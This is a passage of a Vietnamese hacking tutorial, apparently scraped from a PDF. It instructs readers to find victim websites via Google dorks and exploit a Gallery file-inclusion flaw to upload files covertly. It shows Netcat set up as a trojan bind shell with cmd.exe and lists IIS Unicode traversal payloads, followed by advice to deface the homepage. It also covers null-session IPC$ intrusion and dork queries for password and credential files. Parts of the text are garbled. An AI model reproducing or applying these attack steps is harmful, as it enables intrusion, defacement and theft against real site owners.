Giáo trình hack

Giáo trình hack Bạn hãy đặt tên là upload.php , nó sẽ dùng để upload lên trang Web của nạn nhân . _ Tiếp theo Bạn vào Google, gõ ``Powered by gallery`` rồi enter, Google sẽ liệt kê một đống những site sử dụng Gallery , bạn hãy chọn lấy một trang bất kỳ rồI dùng link sau để thử xem nó còn mắc lỗI Gallery hay không : trang Web của nạn nhân > /gallery./captionator.php?GALLERY_BASEDIR=ww wxx.brinkster.com/ / Nếu bạn thấy hiện lên một ô hình chữ nhật ở phía trên cùng , bên phải của nó là ô lệnh chuyển tiếp có chữ “Go” là coi như bạn đa tìm thấy được đốI tượng rồi đó . Bây giờ bạn đa có thể gõ lệnh thông qua ô chữ nhật đó để hack Web của nạn nhân . Trước hết bạn hãy gõ lệnh “pwd” để xác định đường dẫn tuyệt đối đến thư mục hiện thời rồi nhấn nút “Go” , khi nó cho kết quả bạn hãy nhanh chóng ghi lại đường dẫn ở phía dướI ( Tôi sẽ sử dụng VD đường dẫn tôi tìm thấy là “/home/abc/xyz/gallery” ). Sau đó bạn đánh tiếp lệnh “|s –a|” để liệt kê các thư mục con của nó . Bây giờ bạn hãy nhìn kết quả , bạn sẽ thấy một đống các thư mục con mà ta đa liệt kê . Bạn hãy luôn nhớ là mục đích của chúng ta là tìm một thư mục có thể dùng để upload file upload.php mà ta đa chuẩn bị từ trước do đó bạn hãy xác định cùng tôi bằng cách nhìn vào những chữ cuốI cùng của mỗi hàng kết quả : + Bạn hãy loại bỏ trường hợp các thư mục mà có dấu “.” hoặc “.” vì đây là thư mục gốc hoặc là thư mục ảo ( Nó thường được xếp trên cùng của các hàng kết quả ) . + Bạn cũng loạI bỏ những hàng có chữ cuối cùng có gắn đuôi ( VD như config.php , check.inc .v.v ) vì đây là những file chứ không phải là thư mục . + Còn lại là những thư mục có thể upload nhưng tôi khuyên bạn nên chọn những hàng chứa tên thư mục mà có chứa số lớn hơn 1 ( Bạn có thể xác định được chúng bằng cách nhìn cột thứ 2 từ trái sang ) , vì như vậy vừa chắc chắn đây là thư mục không phải thư mục ảo , vừa làm cho admin của trang Web đó khó phát hiện khi ta cài file của ta vào . Tôi VD tôi phát hiện ra thư mục “loveyou” có chứa 12 file có thể cho ta upload , như vậy đường dẫn chính

pdf81 trang | Chia sẻ: aloso | Ngày: 13/12/2013 | Lượt xem: 2177 | Lượt tải: 4download
Bạn đang xem nội dung tài liệu Giáo trình hack, để tải tài liệu về máy bạn click vào nút DOWNLOAD ở trên
ác phiên bản của chúng , phiên bản nào có số lớn nhất thì các bạn hãy Down về mà sài vì nó sẽ có  thêm một số tính năng mà các phiên bản trước chưa có . Nếu down về mà các bạn không biết sử dụng thì  tìm lại các bài viết cũ có hướng dẫn bên Box “Đồ nghề” . Nếu vẫn không thấy thì cứ post bài hỏi , các  bạn bên đó sẽ trả lời cho bạn . 48.) Hướng dẫn sử dụng Netcat : a . ) Giới thiệu : Netcat là một công cụ không thể thiếu được nếu bạn muốn hack một  website nào đó vì nó rất mạnh và tiện dụng . Do đó bạn cần biết một chút về Netcat . b . ) Biên dịch : _ Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng. ­ hiệu chỉnh file netcat.c bằng vi: vi netcat.c + tìm dòng res_init(); trong main() và thêm vào trước 2 dấu ``/``: // res_init(); + thêm 2 dòng sau vào phần #define (nằm ở đầu file): #define GAPING_SECURITY_HOLE #define TELNET ­ biên dịch: make linux ­ chạy thử: ./nc ­h ­ nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi  trường PATH trong file ~/.bashrc, thêm vào ``:.`` PATH=/sbin:/usr/sbin:...:. _ Bản Netcat cho Win không cần phải compile vì đa có sẵn file nhị phân nc.exe. Chỉ vậy  giải nén và chạy là xong. c . ) Các tùy chọn của Netcat : _ Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc ­h để biết các tham số: CODE C:\ > nc ­h connect to somewhere: nc [­options] hostname port [ports] ... listen for inbound: nc ­l ­p port [options] [hostname] [port] options: ­d ­­­­­­­­­­­ tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế độ  steath(không hiển thị trên thanh Taskbar) ­e prog ­­­ thi hành chương trình prog, thường dùng trong chế độ lắng nghe ­h ­­­­­­­­­­­ gọi hướng dẫn ­i secs ­­­­­ trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi ­l ­­­­­­­­­­­­­ đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến ­L ­­­­­­­­­­­­ buộc Netcat ``cố`` lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi ngắt một kết  nối. ­n ­­­­­­­­­­­­ chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7, Netcat sẽ không  thẩm vấn DNS ­o ­­­­­­­­­­­­ file ghi nhật kí vào file ­p port ­­­­­ chỉ định cổng port Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 38 Giáo trình hack ­r yêu cầu Netcat chọn cổng ngẫu nhiên(random) ­s addr ­­­­­ giả mạo địa chỉ IP nguồn là addr ­t ­­­­­­­­­­­­­ không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet đến một  telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn gởi đến các thông tin  phụ như biến môi trường TERM, USER. Nếu bạn sử dụng netcat với tùy chọn ­t để telnet, netcat sẽ  không gởi các thông tin này đến telnetd. ­u ­­­­­­­­­­­­­ dùng UDP(mặc định netcat dùng TCP) ­v ­­­­­­­­­­­­­ hiển thị chi tiết các thông tin về kết nối hiện tại. ­vv ­­­­­­­­­­­ sẽ hiển thị thông tin chi tiết hơn nữa. ­w secs ­­­­ đặt thời gian timeout cho mỗi kết nối là secs mili giây ­z ­­­­­­­­­­­­­ chế độ zero I/O, thường được sử dụng khi scan port Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1­cổng2. Ví dụ: 1­8080 nghĩa là  1,2,3,..,8080 d . ) Tìm hiểu Netcat qua các VD : _ Chộp banner của web server : Ví dụ: nc đến 172.16.84.2, cổng 80 CODE C:\ > nc 172.16.84.2 80 HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần) HTTP/1.1 200 OK Date: Sat, 05 Feb 2000 20:51:37 GMT Server: Apache­AdvancedExtranetServer/1.3.19 (Linux­Mandrake/3mdk) mod_ssl/2.8.2 OpenSSL/0.9.6 PHP/4.0.4pl1 Connection: close Content­Type: text/html Để biết thông tin chi tiết về kết nối, bạn có thể dùng –v ( ­vv sẽ cho biết các thông tin chi tiết hơn nữa) C:\ > nc ­vv 172.16.84.1 80 CODE 172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) [172.16.84.1] 80 (?) open HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Fri, 04 Feb 2000 14:46:43 GMT Server: Apache/1.3.20 (Win32) Last­Modified: Thu, 03 Feb 2000 20:54:02 GMT ETag: ``0­cec­3899eaea`` Accept­Ranges: bytes Content­Length: 3308 Connection: close Content­Type: text/html Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 39 Giáo trình hack sent 17, rcvd 245: NOTSOCK Nếu muốn ghi nhật kí, hãy dùng ­o . Ví dụ: nc ­vv ­o nhat_ki.log 172.16.84.2 80 xem file nhat_ki.log xem thử nó đa ghi những gì nhé : CODE < 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK. < 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04 F < 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54 < 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap < 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache/1.3.20 (Win < 00000050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32)..Last­Modifi < 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb < 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM < 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: ``0­cec­ < 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea``..Accep < 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t­Ranges: bytes. < 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content­Length: < 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio < 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten < 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t­Type: text/htm < 000000f0 6c 0d 0a 0d 0a # l.... dấu < nghĩa là server gởi đến netcat dấu > nghĩa là netcat gởi đến server _ Quét cổng : Bạn hãy chạy netcat với tùy chọn –z . Nhưng để quét cổng nhanh hơn, bạn hãy dùng ­n vì  netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1­ > 500) của host 172.16.106.1 CODE [dt@vicki /]# nc ­nvv ­z 172.16.106.1 1­500 (UNKNOWN) [172.16.106.1] 443 (?) open (UNKNOWN) [172.16.106.1] 139 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open (UNKNOWN) [172.16.106.1] 80 (?) open (UNKNOWN) [172.16.106.1] 23 (?) open nếu bạn cần scan các cổng UDP, dùng ­u CODE [dt@vicki /]# nc ­u ­nvv ­z 172.16.106.1 1­500 (UNKNOWN) [172.16.106.1] 1025 (?) open (UNKNOWN) [172.16.106.1] 1024 (?) open Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 40 Giáo trình hack (UNKNOWN) [172.16.106.1] 138 (?) open (UNKNOWN) [172.16.106.1] 137 (?) open (UNKNOWN) [172.16.106.1] 123 (?) open (UNKNOWN) [172.16.106.1] 111 (?) open _ Biến Netcat thành một trojan : Trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn – l ( listen ) và ­p port để xác định số hiệu cổng cần lắng nghe, ­e để yêu cầu netcat thi hành 1 chương trình  khi có 1 kết nối đến, thường là shell lệnh cmd.exe ( đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ: CODE E:\ > nc ­nvv ­l ­p 8080 ­e cmd.exe listening on [any] 8080 ... connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159 sent 0, rcvd 0: unknown socket error Trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên  cổng đa định, chẳng hạn như 8080 CODE C:\ > nc ­nvv 172.16.84.2 8080 (UNKNOWN) [172.16.84.2] 8080 (?) open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985­1999 Microsoft Corp. E:\ > cd test cd test E:\test > dir /w dir /w Volume in drive E has no label. Volume Serial Number is B465­452F Directory of E:\test [.] [..] head.log NETUSERS.EXE NetView.exe ntcrash.zip password.txt pwdump.exe 6 File(s) 262,499 bytes 2 Dir(s) 191,488,000 bytes free C:\test > exit exit sent 20, rcvd 450: NOTSOCK Như các bạn đa thấy , ta có thể làm những gì trên máy của nạn nhân rồi , chỉ cần một số  lệnh cơ bản , ta đa chiếm được máy tính của đối phương , các bạn hãy xem tiếp nhé : CODE E:\ > nc ­nvv ­L ­p 8080 ­e cmd.exe listening on [any] 8080 ...? ? Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ  cần chỉ định địa Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 41 Giáo trình hack chỉ nguồn là ­s . Ví dụ: CODE netstat ­a ... TCP nan_nhan:domain nan_nhan:0 LISTENING <­ cổng 53 đang lắng nghe ... E:\ > nc ­nvv ­L ­e cmd.exe ­s 172.16.84.1 ­p 53 ­ > lắng nghe ngay trên cổng 53 listening on [172.16.84.1] 53 ... connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163? ? Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền  Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong. Chú ý: bạn không thể chạy netcat với ... ­u ­e cmd.exe... hoặc ...­u ­e /bin/sh... vì netcat sẽ  không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat. ( Dựa theo bài viết của huynh Vicky ) 49.) Kỹ thuật hack IIS server 5.0 : _ IIS server với các phiên bản từ trước đến phiên bản 5.0 đều có lỗi để ta có thể khai  thác , do bây giờ hầu hết mọi người đều dùng IIS server 5.0 nên lỗi ở các phiên bản trước tôi không đề cập  đến . Bây giờ tôi sẽ bày các bạn cách hack thông qua công cụ activeperl và IE , các bạn có thể vận  dụng cho các trang Web ở VN vì chúng bị lỗi này rất nhiều . Ta hãy bắt đầu nhé . _ Trước hết các bạn hãy download activeperl và Unicode.pl . _ Sử dụng telnet để xác định trang Web ta tấn công có sử dụng IIS server 5.0 hay không : CODE telnet  80 GET HEAD / HTTP/1.0 Nếu nó không báo cho ta biết mục tiêu đang sử dụng chương trình gì thì các bạn hãy thay  đổi cổng 80 bằng các cổng khác như 8080, 81, 8000, 8001 .v.v… _ Sau khi đa xác định được mục tiêu các bạn vào DOS gõ : CODE perl unicode.pl Host: ( gõ địa chỉ server mà các bạn muốn hack ) Port: 80 ( hoặc 8080, 81, 8000, 8001 tuỳ theo cổng mà ta đa telnet trước đó ) . _ Các bạn sẽ thấy bảng liệt kê lỗi ( đa được lập trình trong Unicode.pl ) như sau : CODE [1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+ [2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+ [3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+ Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 42 Giáo trình hack [4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+ [5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+ [6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+ [7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+ [8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+ [9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+ [10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+ [11]/scripts/..%f0%80%80%af../winnt/system32/cmd.ex e?/c+ [12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe ?/c+ [13]/scripts/..%fc%80%80%80%80%af../winnt/system32/ cmd.exe?/c+ [14]/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0 \ %80\%af../winnt/system32/cmd.exe?/c+ [15]/cgi­bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%  af../winnt/system32/cmd.exe?/c+ [16]/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% af../winnt/system32/cmd.exe?/ c+ [17]/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c  0%af../winnt/system32/cmd.exe?/c+ [18]/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/ c+ [19]/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0 %af../winnt/system32/cmd.exe?/ c+ [20]/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c  0%af../winnt/system32/cmd.exe?/c+ Các bạn sẽ thấy được tất cả các lỗi trên nếu trang Web nạn nhân bị tất cả những lỗi như  vậy , nếu server của nạn nhân chỉ bị lỗi thứ 13 và 17 thì bảng kết quả chỉ xuất hiện dòng thứ 13 và 17 mà  thôi . Tôi lấy VD là bảng kết quả cho tôi biết trang Web nạn nhân bị lỗi thứ 3 và 7 , tôi sẽ ra IE  và nhập đoạn mã tương ứng trên Address :  c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 3 hoặc  c../winnt/system32/cmd.exe?/c+ < == lỗi dòng thứ 7 Đến đây các bạn đa có thể xâm nhập vào server của nạn nhân rồi đó , các bạn hãy sử  dụng lệnh trong DOS mà khai thác thông tin trong này . Thông thường các trang Web nằm ở thư mục  vinetpub\wwwroot , các bạn vào được rồI thì chỉ cần thay index.html vớI tên hack by …. Là được rồi , đừng  quậy họ nhé . GOOKLUCK!!!!!!!!!!!!!!! Cảm ơn bạn FighterVn đa chia sẻ. Về topic "những hiểu biết cơ bản để trờ thành Hacker  "các bạn có thể tham khảo thêm ở quantrimang.com. Cuối tuần mình cũng xin đóng ghóp một vài mẹo nhỏ. ­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­ Nhưng nếu các bạn biết rồi ,tôi khuyên các bạn chớ "nghịch nhiều".Vài người bạn của đa  và đang khốn khổ vì hack đấy! Chẳng biết kiếm được bao tiền CÁCH ĐỘT NHẬP MẠNG LAN Giơi thiêu sơ lươc cho cac ban môt vai cach thưc cơ ban đê kiêm tra va tim cach đôt nhâp  vao 1 may tinh trong LAN. 1­ Kiêm tra IPC share: IPC viêt tăt cua Inter­Process Communication, đươc dung trong  viêc chia se dư liêu giưa cac ưng dung va may tinh trên mang (NT/2K). Khi môt may đươc khơi đông va log  vao mang, hdh se tao 1 chia se ngâm đinh tên la IPC$. No se giup cho cac may khac co thê nhin thây va kêt  nôi đên cac chia se trên may nay. Tuy nhiên, co thê vi môt ly do gi đo, ngươi dung xoa mât IPC$ share, do  đo, ta cân kiêm tra va tao lai kêt nôi đên IPC$ (goi la null connection), nêu kêt nôi thanh công, ta co thê  thây đươc ca cac chia xe đăc biêt đươc ân (bao gôm C$, ADMIN$, IPC$, IPC$). Cu thê, dung 1 trong 3 lênh  sau ơ command Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 43 Giáo trình hack prompt: C:\>NET USE \\TARGET\IPC$ "" /USER:"" C:\>NET USE \\TARGET\IPC$ * /USER: C:\>NET USE \\TARGET\IPC$ * /USER:"" trong đo: target la computername hoăc IP cua may ban muôn kêt nôi. Lưu y, cac chia xe co dâu $ phia sau tên chi ra răng chia xe đo đươc ân va cach nay chi  ap dung khi công NetBios 139 cua may ban va may đich đươc mơ. Thương la đôi vơi chia xe dang nay, ban se it co cơ hôi khai thac đươc gi. Tuy nhiên, nêu  may măn, ban vân co thê khai thac đươc trong trương hơp cac chia xe đo không yêu câu mât khâu. Kê đên, ban dung lênh sau đê xem cac chia xe thây đươc: C:\>net view \\TARGET Lênh net view se liêt kê danh sach cac share cua may đich. Ban dung net view /? đê biêt  thêm cac cach dung khac. Sau khi tao đươc null connection va biêt đươc cac share trên may đôi phương. Ðôi vơi cac  share đươc bao vê băng username/password, ban co thê dung cac tool sau đê thư ##### chung: Nat  (NetBIOS Auditing Tool)... Ðê tiêt kiêm thơi gian, ban tim va dung thư chương trinh xSharez scanner, cung co thê cho  ban kêt qua tương tư. 2­ Kiêm tra cac công mơ Môt cach khac đê connect vao môt may la duyêt cac port mơ cua may đich. Tuy loai port  ma ta co cach thưc khai thac khac nhau, đơn gian nhât la dung telnet đê connect vao may thông qua port  đươc mơ, vi du: C:\telnet anhnguyen 69 Môt sô port thông dung: 21: FTP 23: Telnet proxy server 25: SMTP 110: POP3 139: NETBIOS 1080: SOCKS proxy 6667: IRC mapping ..... Cac công cu đê scan port co rât nhiêu, vi du như: superscan, elite, .... Sau khi scan đươc port nao đang opened, nêu port đo ngoai nhưng port trên, ban thư  dung telnet đê connect, nêu thanh công, ban co thê vao command prompt shell cua may đo. 3­ Kiêm tra cac lô hông cua OS/Software Cach cuôi cung tơ noi ơ đây, cung la cach kho nhât la duyêt xem may đo đang dung OS  gi, server gi, software nao. Môi loai trên co cac hole/vulnerability riêng, đươc tim thây va mô ta chi tiêt  trong cac site vê security như ntbugtraq, securityfocus, hoăc trong forum. Tư nhưng lô hông biêt đươc, ta sư dung cac exploit tương ưng đê thâm nhâp vao may. Lôi sơ đăng nhât trong cac system software la lôi vê cach đăt password, vi du như cac  may Wins 9x co thê vao ma không cân password (tât nhiên la khi đo, ngươi log vao se bi han chê truy câp cac  tai nguyên mang); hoăc như vơi NT/2K, sau khi setup, password ngâm đinh cua adminnistrator la  rông, nêu user không thay đôi pass cho admin, thi ta co thê connect remote đươc dươi username la  administrator ma không cân pass. Cac lôi con lai thương la do cac sai sot trong qua trinh viêt chương trinh ma vô tinh tao nên  nhưng lô hông, cac đoan code kiêm tra không đây đu, không stable...cho phep ngươi dung thưc thi  cac lênh, chay cac chương trinh tư xa. Vi du như bug Unicode encoding cua IIS4... Va cach thương dung  đê nhâp la tim cach send 1 trojant/backdoor (điên hinh như Netcat...) đên may đo, chay backdoor đo đê  mơ 1 port nhât đinh nao đo, rôi ta se connect remote vao port đo.(cam ơn hk đã cung câp cho tôi tai liêu  nay) Google hack toàn tập (sưu tầm) Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 44 Giáo trình hack Demystifying Google Hacks By Debasis Mohanty by Debasis Mohanty (Orissa, India) www.hackingspirits.com Dịch bởi freewarez@ddth.com Giới thiệu Tôi đa nghĩ về việc công bố bài báo này từ lâu nhưng vì thiếu thời gian nên tôi đa không  thể hoàn thành nó. Tôi đa bổ sung và cập nhật bài báo này khi tôi đa mệt mỏi với công việc nghiên cứu  hàng ngày. Google là máy tìm kiếm mạnh mẽ và phổ biến nhất thế giới,nó có khả năng chấp nhận  những lệnh được định nghĩa sẵn khi nhập vào và cho những kết quả không thể tin được.Điều này cho phép  những người dùng có dã tâm như tin tặc, #####ers, và script kiddies v.v... sử dụng máy tìm kiếm Google để thu thập những  thông tin bí mật và nhạy cảm, những cái mà không thể nhìn thấy qua những tìm kiếm thông thường. Trong bài báo này tôi sẽ làm rõ những điểm dưới đây mà những người quản trị hoặc  chuyên gia bảo mật phải đưa vào tài khoản để phòng chống những thông tin bí mật bị phơi bày. ­ Những cú pháp tìm kiếm nâng cao với Google ­ Tìm kiếm những Site hoặc Server(máy chủ) dễ bị tấn công sử dụng những cú pháp nâng  cao của Google ­ Bảo mật cho servers hoặc sites khỏi sự tấn công của Google Những cú pháp tìm kiếm nâng cao với Google Dưới đây thảo luận về những lệnh đặc biệt của Google và tôi sẽ giải thích từng lệnh một  cách ngắn gọn và nói rõ nó được sử dụng như thế nào để tìm kiếm thông tin. [ intitle: ] Cú pháp “intitle:” giúp Google giới hạn kết quả tìm kiếm về những trang có chứa từ đó  trong tiêu đề. Ví dụ, “intitle: login password” (không có ngoặc kép) sẽ cho kết quả là những link đến những  trang có từ "login" trong tiêu đề, và từ "password" nằm ở đâu đó trong trang. Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 45 Giáo trình hack Tương tự, nếu ta muốn truy vấn nhiều hơn một từ trong tiêu đề của trang thì ta có thể  dùng “allintitle:” thay cho “intitle” để có kết quả là những trang có chứa tất cả những từ đó trong tiêu đề. Ví  dụ như dùng “intitle: login intitle: password” cũng giống như truy vấn “allintitle: login password”. [ inurl: ] Cú pháp “inurl:” giới hạn kết quả tìm kiếm về những địa chỉ URL có chứa từ khóa tìm kiếm.  Ví dụ: “inurl: passwd” (không có ngoặc kép) sẽ cho kết quả là những link đến những trang có từ  "passwd" trong URL. Tương tự, nếu ta muốn truy vấn nhiều hơn một từ trong URL thì ta có thể dùng “allinurl:”  thay cho “inurl” để được kết quả là những URL chứa tất cả những từ khóa tìm kiếm.Ví dụ: “allinurl:  etc/passwd“ sẽ tìm kiếm những URL có chứa “etc” và “passwd”. Ký hiệu gạch chéo (“/”) giữa các từ sẽ bị  Google bỏ qua. [ site: ] Cú pháp “site:” giới hạn Google chỉ truy vấn những từ khóa xác định trong một site hoặc  tên miền riêng biệt. Ví dụ: “exploits site:hackingspirits.com” (không có ngoặc kép) sẽ tìm kiếm từ khóa  “exploits” trong những trang hiện có trong tất cả các link của tên miền “hackingspirits.com”. Không có  khoảng trống nào giữa “site:” và “tên miền”. [ filetype: ] Cú pháp “filetype:” giới hạn Google chỉ tìm kiếm những files trên internet có phần mở rộng  riêng biệt (Ví dụ: doc, pdf hay ppt v.v...). Ví dụ : “filetype:doc site:gov confidential” (không có ngoặc kép)  sẽ tìm kiếm những file có phẩn mở rộng là “.doc” trong tất cả những tên miền của chính phủ có phần  mở rộng là “.gov” và chứa từ “confidential”(bí mật) trong trang hoặc trong file “.doc”. Ví dụ . Kết quả sẽ  bao gồm những liên kết đến tất cả các file văn bản bí trên các site của chính phủ. [ link: ] Cú pháp “link:” sẽ liệt kê những trang web mà có các liên kết đến đến những trang web  chỉ định. Ví dụ : chuỗi “link:www.securityfocus.com” sẽ liệt kê những trang web có liên kết trỏ đến trang  chủ SecurityFocus. Chú ý không có khoảng trống giữa "link:" và URL của trang Web. [ related: ] Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 46 Giáo trình hack Cú pháp “related:” sẽ liệt kê các trang Web "tương tự" với trang Web chỉ định. Ví dụ : “related:www.securityfocus.com” sẽ liệt kê các trang web tương tự với trang chủ  Securityfocus. Nhớ rằng không có khoảng trống giữa "related:" và URL của trang Web. [ cache: ] Truy vấn “cache:” sẽ cho kết quả là phiên bản của trang Web mà mà Google đa lưu lại. Ví  dụ: “cache:www.hackingspirits.com” sẽ cho ra trang đa lưu lại bởi Google's. Nhớ rằng không  có khoảng trống giữa "cache:" và URL của trang web. Nếu bạn bao gồm những từ khác trong truy vấn, Google sẽ điểm sáng những từ này trong  văn bản đa được lưu lại. Ví dụ: “cache:www.hackingspirits.com guest” sẽ cho ra văn bản đa được lưu lại có từ  "guest" được điểm sáng. [ intext: ] Cú pháp “intext:” tìm kiếm các từ trong một website riêng biệt. Nó phớt lờ các liên kết hoặc  URL và tiêu đề của trang. Ví dụ: “intext:exploits” (không có ngoặc kép) sẽ cho kết quả là những liên kết đến những  trang web có từ khóa tìm kiếm là "exploits" trong các trang của nó. [ phonebook: ] “phonebook” tìm kiếm thông tin về các địa chỉ đường phố ở Mỹ và số điện thoại. Ví dụ: “phonebook:Lisa+CA” sẽ liệt kê tất cả các tên người có từ “Lisa” trong tên và ở “California  (CA)”. Cú pháp này có thể được sử dụng như là một công cụ tuyệt vời của tin tặc trong trường hợp ai đó  muốn tìm kiếm thông tin cá nhân cho công việc xã hội. Truy vấn các site hoặc server dễ bị tấn công sử dụng các cú pháp nâng cao của Google Những cú pháp truy vấn nâng cao thảo luận ở trên thực sự có thể giúp người ta chính xác  hóa các tìm kiếm và có được những gì họ thực sự tìm kiếm. Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 47 Giáo trình hack Bây giờ Google trở thành một máy tìm kiếm thông minh, những người dùng có ác ý không  hề bận tâm khai thác khả năng của nó để đào bới những thông tin bí mật từ internet mà chỉ có sự truy  cập giới hạn. Bây giờ tôi sẽ thảo luận những kỹ thuật này một cách chi tiết làm thế nào để những người  dùng ác tâm đào bới thông tin trên internet sử dụng Google như một công cụ. Sử dụng cú pháp “Index of ” để tìm kiếm các site cho phép duyệt chỉ mục Một webserver(máy chủ web) cho phép duyệt chỉ mục nghĩa là bất kỳ ai có thể duyệt các  thư mục của webserver như các thư mục nội bộ thông thường. Ở đây tôi sẽ thảo luận làm thế nào để sử  dụng cú pháp "index of" để có một danh sách các liên kết đến webserver cho phép duyệt thư mục. Cách này trở thành một nguồn dễ dàng cho việc thu thập thông tin của tin tặc. Tưởng  tưởng nếu họ nắm được các file mật khẩu hoặc các file nhạy cảm khác mà bình thưởng không thể thấy được  trên internet. Dưới đây là vài Ví dụ sử dụng để có được quyền truy cập vào rất nhiều thông tin nhạy cảm  dễ dàng hơn rất nhiều: Index of /admin Index of /passwd Index of /password Index of /mail "Index of /" +passwd "Index of /" +password.txt "Index of /" +.htaccess "Index of /secret" "Index of /confidential" "Index of /root" "Index of /cgi­bin" "Index of /credit­card" "Index of /logs" "Index of /config" Sưu tầm bởi Huỳnh Mai Anh Kiệt – huynhmaianhkiet@gmail.com Website: www.a2trungvuong.net – www.a2trungvuong.somee.com Trang 48 Giáo trình hack Tìm kiếm các site hoặc server dễ bị tấn công sử dụng cú pháp “inurl:” hoặc “allinurl:” a. Sử dụng “allinurl:winnt/system32/” (không có ngoặc kép) sẽ liệt kê tất cả các liên kết  đến server mà cho phép truy cập đến những thư mục giới hạn như “system32” qua web. Nếu bạn đủ may  mắn thì bạn có thể có quyền truy cập đến file cmd.exe trong thư mục “system32”. Một khi bạn có quyền truy  cập đến file “cmd.exe” và có thể thực thi nó thì bạn có thể tiến lên xa hơn leo thang quyền của bạn khắp server và làm hại nó. b. Sử dụng 